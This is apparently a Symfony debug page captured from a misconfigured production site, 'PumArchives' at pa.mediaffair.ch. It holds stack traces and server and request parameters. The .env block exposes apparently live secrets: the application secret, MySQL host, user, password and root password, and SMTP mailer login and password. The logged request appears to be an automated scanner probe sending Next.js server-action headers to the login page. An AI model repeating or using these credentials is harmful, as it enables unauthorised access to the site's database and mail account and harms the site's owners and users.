    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 70
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall.php"
    "line" => 92
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 127
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 74
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/Kernel.php"
    "line" => 184
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/public/index.php"
    "line" => 5
    "args" => [
      "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Http\Firewall\ContextListener:171
[
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall/ContextListener.php"
    "line" => 171
    "function" => "remove"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelResponse"
    "class" => "Symfony\Component\Security\Http\Firewall\ContextListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 127
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 196
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 142
    "function" => "filterResponse"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 74
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/Kernel.php"
    "line" => 184
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/public/index.php"
    "line" => 5
    "args" => [
      "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_DB_ADMIN_PORT
"8112"
APP_ENV
"dev"
APP_MAILER_PORT
"8113"
APP_NAME
"PumArchives"
APP_PORT
"8111"
APP_SECRET
"nUEsFSZkwuCbMrDKSt4S7jUjr2yZVczk"
DATABASE_URL
"mysql://fkod_pumarchive:22Media23_archives@fkod.myd.infomaniak.com:/fkod_pumarchives?serverVersion=5.7"
LAST_DOCS
"8"
MAILER_DSN
"smtp://noreply@mediaffair.ch:22NoRep23!!@mail.infomaniak.com"
MAILER_SENDER
"noreply@mediaffair.ch"
MAILER_SENDER_HOST
"mail.infomaniak.com"
MAILER_SENDER_PASS
"22NoRep23!!"
MYSQL_DB
"fkod_pumarchives"
MYSQL_HOST
"fkod.myd.infomaniak.com"
MYSQL_PASS
"22Media23_archives"
MYSQL_PORT
"3306"
MYSQL_ROOT_PASS
"superSecr3t"
MYSQL_USER
"fkod_pumarchive"
NBRE_DOCS
"10"
SECURE_SCHEME
"https"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"772"
CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
CONTEXT_DOCUMENT_ROOT
"/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/.config/apache/pa.mediaffair.ch/.fpm/"
CONTEXT_PREFIX
"/.fpm/"
DOCUMENT_ROOT
"/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/current/public"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_COOKIE
"PHPSESSID=ab9c2c283020b3478947c2b317115f42; sf_redirect=%7B%22token%22%3A%22e2d0f0%22%2C%22route%22%3A%22app_login%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CSecurityController%22%2C%22method%22%3A%22login%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Fclients%5C%2F013cd3874d6bf3c597cb5d6bacfc5c3d%5C%2Fsites%5C%2Fpumarchives%5C%2Freleases%5C%2F9%5C%2Fsrc%5C%2FController%5C%2FSecurityController.php%22%2C%22line%22%3A13%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST
"pa.mediaffair.ch"
HTTP_NEXT_ACTION
"x"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
HTTP_X_FORWARDED_PROTO
"https"
HTTP_X_NEXTJS_HTML_REQUEST_ID
"SSTMXm7OJ_g0Ncx6jpQt9"
HTTP_X_NEXTJS_REQUEST_ID
"b5dce965"
ORIG_PATH_INFO
"/index.php"
ORIG_PATH_TRANSLATED
"/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/current/public/index.php"
ORIG_SCRIPT_FILENAME
"/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/.config/apache/pa.mediaffair.ch/.fpm/php5.external"
ORIG_SCRIPT_NAME
"/.fpm/php5.external"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF
"/index.php"
PHP_VERSION
"8.1"
QUERY_STRING
""
REDIRECT_HANDLER
"php5-fcgi"
REDIRECT_HTTPS
"on"
REDIRECT_PHP_VERSION
"8.1"
REDIRECT_REDIRECT_HTTPS
"on"
REDIRECT_REDIRECT_PHP_VERSION
"8.1"
REDIRECT_REDIRECT_SCRIPT_URI
"https://pa.mediaffair.ch/login"
REDIRECT_REDIRECT_SCRIPT_URL
"/login"
REDIRECT_REDIRECT_STATUS
"200"
REDIRECT_REDIRECT_UNIQUE_ID
"aTjsyqWH0dlGZo2VHL4gPwAAAFE"
REDIRECT_SCRIPT_URI
"https://pa.mediaffair.ch/login"
REDIRECT_SCRIPT_URL
"/login"
REDIRECT_STATUS
"200"
REDIRECT_UNIQUE_ID
"aTjsyqWH0dlGZo2VHL4gPwAAAFE"
REDIRECT_URL
"/index.php"
REMOTE_ADDR
"13.40.9.145"
REMOTE_PORT
"38646"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1765338314
REQUEST_TIME_FLOAT
1765338314.0884
REQUEST_URI
"/login"
SCRIPT_FILENAME
"/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/current/public/index.php"
SCRIPT_NAME
"/index.php"
SCRIPT_URI
"https://pa.mediaffair.ch/login"
SCRIPT_URL
"/login"
SERVER_ADDR
"127.0.0.80"
SERVER_ADMIN
"webmaster@mediaffair.ch"
SERVER_NAME
"pa.mediaffair.ch"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
""
SERVER_SOFTWARE
"Apache"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,DATABASE_URL,APP_NAME,LAST_DOCS,NBRE_DOCS,APP_PORT,APP_DB_ADMIN_PORT,APP_MAILER_PORT,MYSQL_ROOT_PASS,MYSQL_USER,MYSQL_PASS,MYSQL_HOST,MYSQL_DB,MYSQL_PORT,MAILER_SENDER,MAILER_SENDER_PASS,MAILER_SENDER_HOST,MAILER_DSN,SECURE_SCHEME"
TEMP
"/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/tmp"
TMP
"/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/tmp"
TMPDIR
"/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/tmp"
UNIQUE_ID
"aTjsyqWH0dlGZo2VHL4gPwAAAFE"